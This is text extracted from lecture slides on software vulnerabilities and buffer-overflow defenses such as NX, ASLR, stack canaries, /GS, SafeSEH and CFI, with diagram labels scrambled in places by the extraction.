http://owasp.org Dawn Song 86

What are software vulnerabilities?

• Flaws in software
• Break certain assumptions important for security
– What assumptions broken in buffer overflow?

Dawn Song 87

Why does software have vulnerabilities?
• Programmers are humans!
– Humans make mistakes!
• Programmers were not security aware

• Programming languages are not designed well for
security

Dawn Song 88

What can you do?
• Programmers are humans!
– Humans make mistakes!
– Use tools! (next lecture)
• Programmers were not security aware
– Learn about different common classes of coding errors
• Programming languages are not designed well for
security
– Pick better languages

Dawn Song 89


Software Security (III):
Buffer-overflow Defenses

Dawn Song 90

Preventing hijacking attacks
Fix bugs:
• Audit software
• Automated tools: Coverity, Prefast/Prefix, Fortify
• Rewrite software in a type-safe language (Java, ML)
• Difficult for existing (legacy) code …

Allow overflow, but prevent code execution

Add runtime code to detect overflows exploits:
• Halt process when overflow exploit detected
• StackGuard, Libsafe

Dawn Song 91

Control-hijacking Attack Space

Code Injection Arc Injection

Stack

Heap

Exception
Handlers

Dawn Song 92

Defense I: non-execute (W^X)

Prevent attack code execution by marking stack and
heap as non-executable
• NX-bit on AMD Athlon 64, XD-bit on Intel P4
Prescott
– NX bit in every Page Table Entry (PTE)
• Deployment:
– Linux (via PaX project); OpenBSD
– Windows: since XP SP2 (DEP)
• Boot.ini : /noexecute=OptIn or AlwaysOn
• Visual Studio: /NXCompat[:NO]
Dawn Song 93

Effectiveness and Limitations
• Limitations:
– Some apps need executable heap (e.g. JITs).
– Does not defend against `return-to-libc’ exploits


Stack Non-Execute (NX)*

Heap Non-Execute (NX)*

Exception Non-Execute (NX)*
Handlers

* When Applicable Dawn Song 94

Defense II: Address Randomization
ASLR: (Address Space Layout Randomization)
-0xFFFFFFFF
– Start stack at a random location
Reserved for Kernal
– Start heap at a random locatioin -0xC0000000
– Map shared libraries to rand location in process unused
user stack -0xBFF9AB20
memory user stack
Attacker cannot jump directly to exec
function
– Deployment: (/DynamicBase)
shared libraries
• Windows Vista: 8 bits of randomness for DLLs shared libraries -0x40000000
– aligned to 64K page in a 16MB region
256 choices
run time heap
• Linux (via PaX): 16 bits of randomness for run time heap
libraries
static data segment
– More effective on 64-bit architectures
text segment (program)
-0x08048000
Other randomization methods: unused
– Sys-call randomization: randomize sys-call id’s -0x00000000

Dawn Song
– Instruction Set Randomization (ISR) 95

• Limitations
– Randomness is limited
– Some vulnerabilities can allow secret to be leaked

Stack Non-Execute (NX)* ASLR
ASLR

Heap Non-Execute (NX)* ASLR
ASLR

Exception Non-Execute (NX)* ASLR
ASLR
Handlers

* When Applicable Dawn Song 96

Defense III: StackGuard
• Run time tests for stack integrity
arguments

• Embed “canaries” in stack frames return address
stack frame pointer
and verify their integrity prior to CANARY

function return local variables

Dawn Song 97

Canary Types
• Random canary:
– Random string chosen at program startup.
– Insert canary string into every stack frame.
– Verify canary before returning from function.
• Exit program if canary changed. Turns potential exploit into DoS.
– To exploit successfully, attacker must learn current random string.

• Terminator canary: Canary = {0, newline, linefeed, EOF}
– String functions will not copy beyond terminator.
– Attacker cannot use string functions to corrupt stack.

Dawn Song 98

StackGuard (Cont.)
• StackGuard implemented as a GCC patch.
– Program must be recompiled.

• Low performance effects: 8% for Apache.

• Note: Canaries don’t provide full proof protection.
– Some stack smashing attacks leave canaries unchanged

• Heap protection: PointGuard.
– Protects function pointers and setjmp buffers by
encrypting them: e.g. XOR with random cookie
– Less effective, more noticeable performance effects
Dawn Song 99

StackGuard enhancements: ProPolice
• ProPolice (IBM) - gcc 3.4.1. (-fstack-protector)
– Rearrange stack layout to prevent ptr overflow.

String
Growth arguments
Protects pointer args and local
return address pointers from a buffer overflow
stack frame pointer
CANARY

local string buffers

local string variables
Stack
Growth
local non-buffer
variables
pointers, but no arrays
copy of pointer args

Dawn Song 100

MS Visual Studio /GS [since 2003]

Compiler /GS option:
– Combination of ProPolice and Random canary.
– If cookie mismatch, default behavior is to call _exit(3)

Function prolog: Function epilog:
sub esp, 8 // allocate 8 bytes for cookie mov ecx, DWORD PTR [esp+8]
mov eax, DWORD PTR ___security_cookie xor ecx, esp
xor eax, esp // xor cookie with current esp call @__security_check_cookie@4
mov DWORD PTR [esp+8], eax // save in stack add esp, 8

Enhanced /GS in Visual Studio 2010:
– /GS protection added to all functions, unless can be proven unnecessary

Dawn Song 101

/GS stack frame

String
arguments
Growth
return address
stack frame pointer
Canary protects ret-addr and
exception handlers
exception handler frame
CANARY

local string buffers

local string variables

Stack local non-buffer
pointers, but no arrays
variables
Growth

Dawn Song 102

• Limitation:
– Evasion with exception handler * When Applicable


ASLR StacKGuard(Canaries)
StacKGuard(Canaries) ProPolice
ProPolice /GS
/GS

ASLR PointGuard
PointGuard

ASLR
Handlers
Dawn Song 103

Evading /GS with exception handlers
• When exception is thrown, dispatcher walks handler
up exception list until handler is found
next
(else use default handler)

After overflow: handler points to attacker’s code
handler
exception triggered ⇒ control hijack
next
crafted
ptr
Main point: exception is triggered buffer
buffer
before canary is checked
handler
handler
SEH frame
next
next

Defense III: SAFESEH and SEHOP
• /SAFESEH: linker flag
– Linker produces a binary with a table of safe exception handlers
– System will not jump to exception handler not on list

• /SEHOP: platform defense (since win vista SP1)
– Observation: SEH attacks typically corrupt the “next” entry in SEH list.
– SEHOP: add a dummy record at top of SEH list
– When exception occurs, dispatcher walks up list and verifies dummy
record is there. If not, terminates process.

Dawn Song 105

• Limitations:
– Require recompilation * When Applicable


ProPolice /GS
/GS

ASLR PointGuard
PointGuard

ASLR SAFESEH and SEHOP
Handlers SAFESEH and SEHOP
Dawn Song 106

Defense IV: Libsafe

• Dynamically loaded library
return address
(no need to recompile app.)
main stack frme pointer
• Intercepts calls to strcpy (dest, src)
buf
– Validates sufficient space in current src
stack frame: dest
Libsafe strcpy
|frame-pointer – dest| > strlen(src) ret
sfp
– If so, does strcpy. Otherwise,
terminates application

Dawn Song 107

• Limitations:
– Limited protection
* When Applicable

ProPolice /GS
/GS libsafe
libsafe
ASLR PointGuard
PointGuard


Dawn Song 108

Other Defenses
 StackShield
 At function prologue, copy return address RET and SFP
to “safe” location (beginning of data segment)
 Upon return, check that RET and SFP is equal to copy.
 Implemented as assembler file processor (GCC)

 Control Flow Integrity (CFI)
 A combination of static and dynamic checking
 Statically determine program control flow
 Dynamically enforce control flow integrity
Dawn Song 109

• Many different kinds of attacks. Not one silver
bullet defense. * When Applicable


ProPolice /GS
/GS StackShield
StackShield libsafe
libsafe
ASLR PointGuard
PointGuard


Dawn Song 110

(partial) Defenses (HEAP)

• Protect heap function pointers
(e.g. PointGuard)

• Better browser architecture:
– Store JavaScript strings in a separate non-
heap from browser heap
writable
pages
• OpenBSD heap overflow protection:

prevents
cross-page
overflows
• Nozzle *RLZ’08+ : detect sprays by
prevalence of code on heap Dawn Song 112

• Many different kinds of attacks. Not one silver
bullet defense. * When Applicable

Stack Non-Execute (NX)* ASLR Others:
StacKGuard(Canaries) ProPolice Libsafe
ProPolice /GS
/GS StackShield
StackShield Control Flow Integrity (CFI)
Control Flow Integrity (CFI)
ASLR PointGuard
PointGuard OpenBSD Heap overflow protection
OpenBSD Heap overflow protection Nozzle
Nozzle
Handlers SAFESEH and SEHOP Dawn Song 113

Day 1-1-intro-sw-vuls

More Related Content

What's hot (15)

Similar to Day 1-1-intro-sw-vuls (20)

Recently uploaded (20)

Day 1-1-intro-sw-vuls

Editor's Notes